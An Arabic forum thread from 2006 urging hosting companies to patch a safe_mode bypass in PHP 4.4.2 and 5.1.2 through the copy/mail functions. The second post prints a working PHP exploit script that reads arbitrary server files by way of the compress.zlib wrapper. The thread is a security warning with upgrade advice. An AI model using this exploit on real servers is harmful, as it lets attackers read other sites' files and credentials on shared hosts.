مهم جداً الرجاء من كل شركات الاستضافة الدخول وترقيع ثغرة خطيرة جداً,,

support4php · #1 17-06-2006, 07:48 PM

بسم الله الرحمن الرحيم

================================================

الموضوع زي ما قريتو يا اخوان فيه ثغرة في السيرفرات الي تستخدم نظام >> php

من إصدار معين وهي كفيلة لو كانت الثغره في سيرفرك راح يتم اختراق كل المواقع

الي على السيرفر زي السلام عليكم ,, وهذا تفسير الاختراقات حقت الأيام الماضية

كلها بسبب دوال مفعلة في السيرفر خلونا نشوف معلومات عن الثغره وطريقة الحماية منها

واكرر الموضوع مهم جداً لشركات الاستضافة بالذات :-

================================================

معلومات عن الثغرة:-

الدوال المصابة / copy , mail , mb_mail

الثغرة تسمح بتطبيق الأوامر على السيرفر وحالة السيرفر >> safe_mode: ON :thumbdown

الاصدارات المصابة بها / PHP 4.4.2 and PHP 5.1.2 وهالأصدار ما شاء الله اغلب الاستضافات تستخدمه.

الترقيع / تحديث اصدار برنامج >> php الى إصدار غير الي ذكرتها.

ارجو ممن توفرت في سيرفراتهم الشروط المطلوبة لعمل الثغرة سرعة الترقية إلى إصدار غير المصاب..

هذا والله أعلم ,,, اللهم قد بلغت.

support4php · #2 17-06-2006, 07:49 PM

وهذا جزء من أكواد الشيل الي يستخدم في تخطي السيف مود للاصدارات الي ذكرتها:-

كود PHP:


			
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
*/

$tymczas="/home/web/public_html/vb"; // Set $tymczas to dir where you have 777 like /var/tmp

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = " ON (secure)";
}
else {$safemode = false; $hsafemode = " OFF (not secure)";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = " .$v. ";}
else {$openbasedir = false; $hopenbasedir = " OFF (not secure) ";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo " NONE ";}else{echo " $df ";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);

echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\n By \n");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo " Start File ".htmlspecialchars($file)." \n".htmlspecialchars($tekst)."\n End File
".htmlspecialchars($file)."  \n";
unlink($temp);
die(" File ".htmlspecialchars($file)." Has been already loaded. Group ... The-;] ");
} else {
die(" Sorry .. File
<B>".htmlspecialchars($file)." dosen't exists or you don't have access. ");
}
?>

السكربت العربي · #3 17-06-2006, 08:01 PM

الله يعطيكـ العافيـة اخوي support4php
ماشاء الله دائمــا متلق بمواضيعكـ سواءً حمايـة أو غير الحمايـة
الله يباركـ فيكـ

support4php · #4 17-06-2006, 08:03 PM

إقتباس:

اقتباس من مشاركة السكربت العربي

	الله يعطيكـ العافيـة اخوي support4php ماشاء الله دائمــا متلق بمواضيعكـ سواءً حمايـة أو غير الحمايـة الله يباركـ فيكـ

الله يعافيك يالغالي ومشكور على الرد الحلو.

s52z.com · #5 02-02-2008, 09:00 PM

جزاك الله خير

Mustafa Albazy · #6 03-02-2008, 06:00 AM

جزاك الله خير اخي

وبل النسبة لصدار الphp

انصح با 4.4.4

بصراحة جدا ممتاز

تحياتي

سعودي لحلول الويب · #7 03-02-2008, 11:02 AM

شكرا

وتم الترقيع

جزاك الله الف خير